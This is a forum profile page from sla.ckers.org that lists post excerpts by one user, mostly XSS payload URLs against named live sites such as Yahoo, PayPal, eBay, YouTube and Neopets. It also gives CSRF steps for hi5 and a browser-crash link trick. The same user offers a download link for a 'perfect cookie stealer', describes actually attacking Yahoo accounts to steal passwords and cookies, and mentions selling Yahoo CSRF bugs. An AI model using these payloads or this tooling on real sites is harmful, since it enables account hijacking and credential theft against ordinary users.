Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 57
4 years ago
nemessis
NOTE: it works only with logged hi5 users 1. Create an account. 2. Upload a pic (not necessarely). 3. Go to and press sign up 4. Check one or all language 5. Type - personal / Purpose - blablabla Now you are redirected to 6. Click "Create your first App" 7. Click "Create Sample App" 8. Click "Sample App" 9. You will receiv
Forum: Full Disclosure
5 years ago
nemessis
http://www.hackersblog.org/wp-content/uploads/2009/09/hi51.png
Forum: Full Disclosure
5 years ago
nemessis
http://cf.yp.yahoo.com/about/createfeedback.html?stype=&what=&where=&ucas=%22%3E%3Cscript%3Ealert(1)%3C/script%3E I don't know why but it doesn't work all the time. And http://pix2.search.mud.yahoo.com/index.php?search=%25C0%2522%2520onmouseover%3Dalert(%2Fxss%2F.source)%2520\&x=0&y=0 Put your mouse over the search box.
Forum: Full Disclosure
6 years ago
nemessis
http://yahoo.com@sla.ckers.org Anyone noticed this "feature" used few years ago to trick IE6 users? It's not the same thing and when I put mouse over a link like that the real address appear in status bar. Any ideea if this "feature" can be fully exploited to make a working url spoof?
Forum: Full Disclosure
6 years ago
nemessis
lads.myspace.com/06_04/MS-60412-13-ORGA-JN/NP_ver2_728x90_tri.swf?clickTag=javascript:alert(/XSS/) or just use http://www.google.com/search?hl=en&q=site%3Amyspace.com+inurl%3Aclicktag&meta= Probably this isn't something new but it works.
Forum: Full Disclosure
6 years ago
nemessis
http://antifrauda.evonet.ro/con.rar - the perfect cookie stealer. Works on any site, forum, blog etc.
Forum: XSS Info
6 years ago
nemessis
Squirrels ex-private method to grab some cookies http://youtube.com/watch?v=9BGl1PskAxs
Forum: XSS Info
6 years ago
nemessis
Tested with IE6 and Firefox Go to http://arcade.neopets.com/tellafriend.php and put "><script>alert(1)</script> in the name form. Another one is located here http://arcade.neopets.com/contact.php
Forum: XSS Info
6 years ago
nemessis
Tested with IE6 and Firefox Go to http://arcade.neopets.com/tellafriend.php and put "><script>alert(1)</script> in the name form. Another one is located here http://arcade.neopets.com/contact.php
Forum: XSS Info
6 years ago
nemessis
Don't click the link below if you have something to save before this test. Your computer or browser may crash. Try to acces a link like ftp://www.domain.com/file.exe#lol (working with <a href tag or if you type this in your address bar). Wait 2-3 seconds and close that page. After the page was closed hundreds of browser instances appears. Note: it seems that it doesn't work on any comp
Forum: Full Disclosure
6 years ago
nemessis
Yahoo! Vulnerabilities (Again) & some tips and tricks Author: NemessisRstZone.Org 1. Webmessenger China - Eternal csrf http://cn.webmessenger.yahoo.com – an application that looks pretty normal for Yahoo! yet its not realy so. The Chinese version doesnt come any close to the original one: http://webmessenger.yahoo.com. What is the problem? User any username to log on
Forum: Full Disclosure
6 years ago
nemessis
About Yahoo! Author: SlicK Email: slick@rstzone.org Website: http://rstzone.org or http://en.rstzone.org This article is a result of about 2 weeks of research, tests and lots of hard work and will cover a few aspects related to Yahoo! that some of you may already know but nonetheless, i find them interesting. The purpose is to shed some light on a few "myths" about yaho
Forum: Full Disclosure
6 years ago
nemessis
hxxp://www.youtube.com/my_profile_organize?type="><script>alert("You%20must%20to%20be%20logged%20in%20to%20see%20this%20alert")</script>&user=Nemessis You need to be logged in your youtube account.
Forum: Full Disclosure
6 years ago
nemessis
Nice. We didn't succeed to make a working exploit for IE7 on the main page of the profile.
Forum: Full Disclosure
6 years ago
nemessis
Yes indeed. Most of them are IE6/IE7 users.
Forum: Full Disclosure
6 years ago
nemessis
Do you have a method to find the results? I'm curios about spreading speed. My results in 10 hours (this was my first attempt and I attacked Yahoo accounts, not hi5 accounts but i used the same hi5 vuln to do that - just IE6 browser was affected in this attempt) http://rapidshare.com/files/74270062/rstpower.wmv.html With IE6 + Firefox affected & a grabber who don't display empty/incomple
Forum: Full Disclosure
6 years ago
nemessis
They know about those issues from long time ago. Is not a secret that hi5 have csrf vuln in at least 4 places on the user profile pages. If you'll search random, you will find some hi-jacked or special made accounts used to stole users passwords or cookies from another web services (Yahoo, Hotmail etc). We tested hi5 to find all the csrf vulns and the results are: - on the main page of the profil
Forum: Full Disclosure
6 years ago
nemessis
This is a better formula Fugitif :) hxxp://togo.ebay.com/app/auctionfinder.php?query=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&page&seller&category=&TZ=-120&block=list
Forum: Full Disclosure
6 years ago
nemessis
I don't like scanners. It's very relaxing for me when I search xss's. (Pentru ca am mai multe decat pot folosi toata viata in yahoo.com iar astea sunt prea terminate. Pun doar ce nu imi foloseste. Uita-te pe RST sa vezi ca yahoo este un subiect de baza la noi si xss-urile de la ei deja nu mai inseamna mare lucru pentru userii nostrii. Nu vand decat csrf-uri in yahoo dar deja devin din ce in ce
Forum: Full Disclosure
6 years ago
nemessis
1 hour on Yahoo.net subdomains searching xss's. I bet that if someone will search everyday 2-3 hours this list will be huge in just 2 weeks. This isn't good at all for Yahoo-inc image. http://lib.store.yahoo.net/lib/danskinonline/fit-zoom.html?img="><script>alert(/Nemessis/)</script>%7Cname=Danskin http://cruises.travel.yahoo.net/CS/ShipExplorer/PublicAreasImg.aspx?URL=&
Forum: Full Disclosure
6 years ago
nemessis
Yahoo (Works with IE6) hxxp://kr.blog.yahoo.com/dudnfkd031/GALLERY/show_image_v2.html?img=javascript:alert(/Nemessis/) hxxp://cn.widget.yahoo.com/gallery/view.htm?widgetID=237&cate="><script>alert(/Nemessis/)</script> hxxp://xk.cn.yahoo.com/category.cgi?category="><script>alert(/Nemessis/)</script> hxxp://captcha.chat.yahoo.com/go/captchat/?i
Forum: Full Disclosure
6 years ago
nemessis
They still have old pages with some issues but I really like how they patch everything very fast.
Forum: Full Disclosure
6 years ago
nemessis
Ronald you have a private message. Thank you.
Forum: Full Disclosure
6 years ago
nemessis
A little example: harrypotter.wizards.pro/visit.php?url=javascript:alert(/Kaboom/)
Forum: XSS Info
6 years ago
nemessis
PayPal.com knowledge.paypal.com/paypal/documentDisplay.do?clusterName=PaypalCluster&preview=1&groupId=1&page=http://knowledge.paypal.com/paypal/solution.jsp?id="><script>alert(/Nemessis-WWW.RSTZONE.ORG/)</script>&docType=1006&resultType=5002&docProp=$solution_id&docPropValue=vs3422
Forum: Full Disclosure
6 years ago
nemessis
Not so dangerous but... hxxp://answercenter.ebay.com/doRedirect.jspa?url=javascript:alert('Nemessis-WWW.RSTZONE.ORG-Firefox-Only') (It works only with Firefox)
Forum: Full Disclosure
6 years ago
nemessis
PayPal again Alert version https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&uid=&campaign_id=604&offer_id=775&landing_url=javascript:alert('Nemessis-CLICK-THE-LINK-(HERE)-IF-YOU-HAVE-FIREFOX') Click on "here" (only firefox users) ----------------------------------------------------- Redirect version: https://www.paypal.com/cgi-bin/webscr?cmd=
Forum: Full Disclosure
6 years ago
nemessis
crmgateway.paypal.com/payflow/cgi-bin/mail_pcancellation.pl?host=remote&processing=Yes&partner_login="><script>alert(/Nemessis-WWW.RSTZONE.ORG/)</script>
Forum: Full Disclosure
6 years ago
nemessis
http://livechat.ebay.com/Chat/IVR/thankyou2.jsp?Chat_ID=&Chat_Queue=&CSR_Name=&Customer_Email=%22%3E%3Cscript%3Ealert(/Nemessis-WWW.RSTZONE.ORG/)%3C/script%3E
Forum: Full Disclosure
7 years ago
nemessis
groups.ebay.com/tags.jspa?tag="><script>alert(/Nemessis-WWW.RSTZONE.ORG/)</script>
Forum: Full Disclosure
Pages: 12Next
Current Page: 1 of 2